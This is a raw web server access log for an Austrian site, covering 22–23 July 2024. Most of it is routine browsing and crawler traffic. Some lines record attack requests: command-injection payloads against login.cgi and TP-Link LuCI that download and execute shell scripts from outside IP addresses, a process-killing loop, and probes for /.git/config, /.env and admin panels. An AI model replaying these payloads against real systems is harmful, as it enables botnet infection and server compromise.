178.165.188.60 - - [22/Jul/2024:16:50:25 +0200] "GET /gui/javascript/form_form.js?1721659825 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=659765" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:51:25 +0200] "GET /entry.php?id=10271&&ser=659825 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=659765" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:51:25 +0200] "GET /gui/javascript/form_form.js?1721659885 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=659825" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:52:26 +0200] "GET /entry.php?id=10271&&ser=659885 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=659825" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:52:26 +0200] "GET /gui/javascript/form_form.js?1721659946 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=659885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:53:26 +0200] "GET /entry.php?id=10271&&ser=659946 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=659885" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:53:26 +0200] "GET /gui/javascript/form_form.js?1721660006 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=659946" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:54:26 +0200] "GET /entry.php?id=10271&&ser=660006 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=659946" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:54:26 +0200] "GET /gui/javascript/form_form.js?1721660066 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:55:27 +0200] "GET /entry.php?id=10271&&ser=660066 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660006" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:55:27 +0200] "GET /gui/javascript/form_form.js?1721660127 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
149.50.103.48 - - [22/Jul/2024:16:56:03 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
178.165.188.60 - - [22/Jul/2024:16:56:27 +0200] "GET /entry.php?id=10271&&ser=660127 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=660066" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:56:27 +0200] "GET /gui/javascript/form_form.js?1721660187 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660127" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
47.89.154.16 - - [22/Jul/2024:16:57:01 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
178.165.188.60 - - [22/Jul/2024:16:57:27 +0200] "GET /entry.php?id=10271&&ser=660187 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660127" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:57:27 +0200] "GET /gui/javascript/form_form.js?1721660247 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:58:27 +0200] "GET /entry.php?id=10271&&ser=660247 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660187" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:58:28 +0200] "GET /gui/javascript/form_form.js?1721660308 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
92.249.48.202 - - [22/Jul/2024:16:59:05 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [22/Jul/2024:16:59:10 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10668762.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [22/Jul/2024:16:59:28 +0200] "GET /entry.php?id=10271&&ser=660308 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660247" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:16:59:28 +0200] "GET /gui/javascript/form_form.js?1721660368 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660308" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:00:28 +0200] "GET /entry.php?id=10271&&ser=660368 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660308" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:00:28 +0200] "GET /gui/javascript/form_form.js?1721660428 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:01:28 +0200] "GET /entry.php?id=10271&&ser=660428 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660368" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:01:29 +0200] "GET /gui/javascript/form_form.js?1721660488 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:02:29 +0200] "GET /entry.php?id=10271&&ser=660488 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660428" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:02:29 +0200] "GET /gui/javascript/form_form.js?1721660549 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660488" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:03:29 +0200] "GET /entry.php?id=10271&&ser=660549 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660488" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:03:29 +0200] "GET /gui/javascript/form_form.js?1721660609 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:04:29 +0200] "GET /entry.php?id=10271&&ser=660609 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660549" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:04:29 +0200] "GET /gui/javascript/form_form.js?1721660669 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
156.59.198.135 - - [22/Jul/2024:17:04:34 +0200] "GET /ed-test.activities.at/stats/lang/awstats-is.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
178.165.188.60 - - [22/Jul/2024:17:05:30 +0200] "GET /entry.php?id=10271&&ser=660669 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660609" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:05:30 +0200] "GET /gui/javascript/form_form.js?1721660730 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:06:30 +0200] "GET /entry.php?id=10271&&ser=660730 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660669" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:06:30 +0200] "GET /gui/javascript/form_form.js?1721660790 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:07:30 +0200] "GET /entry.php?id=10271&&ser=660790 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660730" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:07:30 +0200] "GET /gui/javascript/form_form.js?1721660850 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:08:31 +0200] "GET /entry.php?id=10271&&ser=660850 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=660790" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:08:31 +0200] "GET /gui/javascript/form_form.js?1721660911 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:09:31 +0200] "GET /entry.php?id=10271&&ser=660911 HTTP/1.1" 200 987 "http://hausegger.activities.at/entry.php?id=10271&&ser=660850" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:09:31 +0200] "GET /gui/javascript/form_form.js?1721660971 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:11:07 +0200] "GET /entry.php?id=10271&&ser=660971 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=660911" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:11:08 +0200] "GET /gui/javascript/form_form.js?1721661068 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=660971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:12:08 +0200] "GET /entry.php?id=10271&&ser=661068 HTTP/1.1" 200 988 "http://hausegger.activities.at/entry.php?id=10271&&ser=660971" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:12:08 +0200] "GET /gui/javascript/form_form.js?1721661128 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=661068" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:08 +0200] "GET /entry.php?id=10271&&ser=661128 HTTP/1.1" 200 986 "http://hausegger.activities.at/entry.php?id=10271&&ser=661068" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:08 +0200] "GET /gui/javascript/form_form.js?1721661188 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10271&&ser=661128" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:34 +0200] "GET /entry.php?id=10287&login=1 HTTP/1.1" 200 1879 "http://hausegger.activities.at/entry.php?id=10273&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:35 +0200] "GET /gui/javascript/form_form.js?1721661215 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:36 +0200] "GET /gui/images/progressbar.gif HTTP/1.1" 200 2157 "http://hausegger.activities.at/entry.php?id=10272" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:36 +0200] "POST /entry.php?id=10287& HTTP/1.1" 200 2432 "http://hausegger.activities.at/entry.php?id=10287&login=1" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:36 +0200] "GET /gui/javascript/form_form.js?1721661216 HTTP/1.1" 200 16206 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:36 +0200] "GET /entry.php?id=10270& HTTP/1.1" 200 908 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
178.165.188.60 - - [22/Jul/2024:17:13:36 +0200] "GET /entry.php?id=10273&logout=true& HTTP/1.1" 200 1910 "http://hausegger.activities.at/entry.php?id=10287&" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0"
80.82.77.202 - - [22/Jul/2024:17:20:45 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
5.8.11.202 - - [22/Jul/2024:17:23:05 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Jul/2024:17:32:09 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/202106080903_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [22/Jul/2024:17:41:05 +0200] "GET /renault.activities.at/htdocs/activities/framework/webfx/javascript/flot/README.md HTTP/1.0" 404 330 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.191.126.213 - - [22/Jul/2024:17:58:01 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
181.63.213.49 - - [22/Jul/2024:18:01:13 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
156.59.198.135 - - [22/Jul/2024:18:07:26 +0200] "GET /renault.activities.at/htdocs/export/xml/data/orders/201909231003_RenOrder.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
91.82.63.206 - - [22/Jul/2024:18:16:53 +0200] "GET / HTTP/1.0" 200 423 "-" "-"
149.50.103.48 - - [22/Jul/2024:18:51:43 +0200] "GET / HTTP/1.1" 200 423 "-" "-"
51.15.184.67 - - [22/Jul/2024:18:52:16 +0200] "GET /wp-content/plugins/google-seo-rank/README.txt HTTP/1.1" 404 323 "www.google.com" "Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36"
156.59.198.136 - - [22/Jul/2024:19:09:14 +0200] "GET /ed-test.activities.at/stats/lang/awstats-th.txt HTTP/1.0" 404 306 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
5.8.11.202 - - [22/Jul/2024:19:12:51 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240&Win32"
3.139.78.150 - - [22/Jul/2024:19:25:49 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_2) AppleWebKit/537.4 (KHTML like Gecko) Chrome/22.0.1229.79 Safari/537.4"
183.111.79.82 - - [22/Jul/2024:19:28:39 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://193.35.18.164/klausschwab.sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "linus-torvalds-loves-you"
80.82.77.202 - - [22/Jul/2024:19:34:28 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36"
45.148.10.202 - - [22/Jul/2024:19:51:17 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
91.92.251.38 - - [22/Jul/2024:20:00:44 +0200] "GET / HTTP/1.1" 400 359 "-" "Mozilla/5.0 zgrab/0.x"
13.88.158.175 - - [22/Jul/2024:20:34:58 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
172.212.61.69 - - [22/Jul/2024:20:39:30 +0200] "GET /portal/redlion HTTP/1.1" 404 286 "-" "Mozilla/5.0 zgrab/0.x"
185.224.128.43 - - [22/Jul/2024:20:53:53 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
5.8.11.202 - - [22/Jul/2024:20:58:07 +0200] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [22/Jul/2024:21:01:03 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11320971.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
194.165.17.11 - - [22/Jul/2024:21:07:18 +0200] "\x03" 400 383 "-" "-"
156.59.198.135 - - [22/Jul/2024:21:10:44 +0200] "GET /renault.2web.at/htdocs/binaries/renault-/rs-155-fr.doc HTTP/1.0" 404 310 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
143.198.91.249 - - [22/Jul/2024:21:12:06 +0200] "\x16\x03\x01\x01\x18\x01" 400 383 "-" "-"
45.148.10.202 - - [22/Jul/2024:21:12:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
45.148.10.202 - - [22/Jul/2024:21:12:20 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+wget.sh%3B+wget+http%3A%2F%2F87.121.112.42%2Fwget.sh%3B+chmod+777+wget.sh%3B+.%2Fwget.sh+tplink%3B+rm+-rf+wget.sh%60) HTTP/1.1" 404 371 "-" "Go-http-client/1.1"
195.176.32.148 - - [22/Jul/2024:21:22:46 +0200] "GET /robots.txt HTTP/1.1" 404 298 "-" "Mozilla/5.0 (compatible; MyBot/1.0)"
91.92.244.183 - - [22/Jul/2024:21:27:42 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Linux; Android 12; SM-N985F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Mobile Safari/537.36"
141.98.11.189 - - [22/Jul/2024:21:37:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
35.195.123.144 - - [22/Jul/2024:22:09:24 +0200] "GET / HTTP/1.1" 200 274 "-" "python-requests/2.32.2"
91.92.241.222 - - [22/Jul/2024:22:11:51 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.2) Gecko/20090803 Ubuntu/9.04 (jaunty) Shiretoko/3.5.2"
87.236.176.171 - - [22/Jul/2024:22:34:33 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
87.236.176.102 - - [22/Jul/2024:22:34:34 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)"
156.59.198.136 - - [22/Jul/2024:23:03:36 +0200] "GET /ed-test.2web.at/stats/lang/awstats-cn.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.249.48.202 - - [22/Jul/2024:23:06:55 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
118.194.250.113 - - [22/Jul/2024:23:08:32 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/598.50 (KHTML, like Gecko) Chrome/53.0.244 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:32 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Go-http-client/1.1"
118.194.250.113 - - [22/Jul/2024:23:08:33 +0200] "GET /robots.txt HTTP/1.1" 404 284 "-" "Go-http-client/1.1"
118.194.250.113 - - [22/Jul/2024:23:08:33 +0200] "GET /sitemap.xml HTTP/1.1" 404 285 "-" "Go-http-client/1.1"
118.194.250.113 - - [22/Jul/2024:23:08:40 +0200] "GET /axis2-admin/ HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:40 +0200] "GET /axis2/ HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:41 +0200] "GET /axis2/axis2-admin/ HTTP/1.1" 404 287 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:41 +0200] "GET /phpmyadmin/index.php HTTP/1.1" 404 291 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:42 +0200] "GET /php/thinkphp/aaaffff123.php HTTP/1.1" 404 294 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
118.194.250.113 - - [22/Jul/2024:23:08:42 +0200] "GET /index_sso.php HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36"
94.156.68.162 - - [22/Jul/2024:23:08:46 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Galeon/2.0.6 (Ubuntu 2.0.6-2)"
94.156.68.162 - - [22/Jul/2024:23:10:43 +0200] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36"
91.238.181.24 - - [22/Jul/2024:23:30:56 +0200] "\x03" 400 383 "-" "-"
114.119.135.199 - - [22/Jul/2024:23:42:06 +0200] "GET /robots.txt HTTP/1.1" 404 291 "-" "Mozilla/5.0 (compatible;PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
156.59.198.136 - - [22/Jul/2024:23:56:25 +0200] "GET /renault.activities.at/htdocs/binaries/renault-/rs-129-fr.doc HTTP/1.0" 404 313 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [22/Jul/2024:23:58:52 +0200] "GET /ed-test.2web.at/stats/lang/awstats-br.txt HTTP/1.0" 404 302 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
205.210.31.82 - - [23/Jul/2024:00:03:52 +0200] "GET / HTTP/1.1" 200 274 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
5.8.11.202 - - [23/Jul/2024:00:09:42 +0200] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36"
